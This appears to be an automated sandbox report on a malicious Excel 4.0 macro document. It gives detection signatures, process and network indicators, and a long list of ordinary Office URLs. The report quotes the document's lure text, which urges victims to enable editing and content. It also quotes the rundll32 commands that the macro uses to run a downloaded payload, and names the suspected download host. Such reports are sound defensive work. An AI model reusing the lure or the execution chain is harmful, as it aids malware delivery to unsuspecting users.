Loading ...

Play interactive tourEdit tour

Analysis Report 090811fa_by_Libranalysis.xls

Overview

General Information

Sample Name:090811fa_by_Libranalysis.xls
Analysis ID:412373
MD5:090811fa4bbb26277eebc82843f3d70e
SHA1:135d07236adba8e6441c72df1b7f2c459505583c
SHA256:11dad18ad216bbbf97891c947ef3b70acd0c5a9a0ce80a9f5c4bcaecd7275164
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document contains embedded VBA macros
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 2996 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 5364 cmdline: rundll32 ..\ritofm.cvm,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1048 cmdline: rundll32 ..\ritofm.cvm1,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 2996, ProcessCommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, ProcessId: 5364

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: 090811fa_by_Libranalysis.xlsReversingLabs: Detection: 10%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 192.185.39.58:443 -> 192.168.2.3:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.185.32.232:443 -> 192.168.2.3:49709 version: TLS 1.2

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
Source: global trafficDNS query: name: signifysystem.com
Source: global trafficTCP traffic: 192.168.2.3:49708 -> 192.185.39.58:443
Source: global trafficTCP traffic: 192.168.2.3:49708 -> 192.185.39.58:443
Source: Joe Sandbox ViewIP Address: 192.185.39.58 192.185.39.58
Source: Joe Sandbox ViewIP Address: 192.185.32.232 192.185.32.232
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownDNS traffic detected: queries for: signifysystem.com
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://api.aadrm.com/
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://api.cortana.ai
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://api.office.net
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://api.onedrive.com
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://augloop.office.com
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://augloop.office.com/v2
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://cdn.entity.
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://clients.config.office.net/
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://config.edge.skype.com
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://cortana.ai
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://cortana.ai/api
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://cr.office.com
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://dev.cortana.ai
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://devnull.onenote.com
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://directory.services.
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://graph.windows.net
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://graph.windows.net/
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://lifecycle.office.com
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://login.windows.local
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://management.azure.com
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://management.azure.com/
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://messaging.office.com/
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://ncus.contentsync.
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://officeapps.live.com
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://onedrive.live.com
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://outlook.office.com/
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://outlook.office365.com/
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://powerlift.acompli.net
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://settings.outlook.com
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://staging.cortana.ai
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://tasks.office.com
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://webshell.suite.office.com
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://wus2.contentsync.
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: B99E5236-A278-4329-AD10-8C7390047CAE.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownHTTPS traffic detected: 192.185.39.58:443 -> 192.168.2.3:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.185.32.232:443 -> 192.168.2.3:49709 version: TLS 1.2

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 8Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
Source: Screenshot number: 8Screenshot OCR: Enable Content from the yellow bar above O ' WHY I CANNOT OPEN THIS DOCUMENT ? W You are using
Source: Document image extraction number: 5Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
Source: Document image extraction number: 5Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or An
Source: Document image extraction number: 14Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
Source: Document image extraction number: 14Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? w You are using IDS or
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: 090811fa_by_Libranalysis.xlsInitial sample: CALL
Source: 090811fa_by_Libranalysis.xlsInitial sample: CALL
Source: 090811fa_by_Libranalysis.xlsInitial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: 090811fa_by_Libranalysis.xlsInitial sample: Sheet size: 14902
Source: 090811fa_by_Libranalysis.xlsOLE indicator, VBA macros: true
Source: classification engineClassification label: mal76.expl.evad.winXLS@5/6@2/2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{59F69311-7D11-4C4D-A0AE-4713C424E1FC} - OProcSessId.datJump to behavior
Source: 090811fa_by_Libranalysis.xlsOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: 090811fa_by_Libranalysis.xlsReversingLabs: Detection: 10%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServerJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServerJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
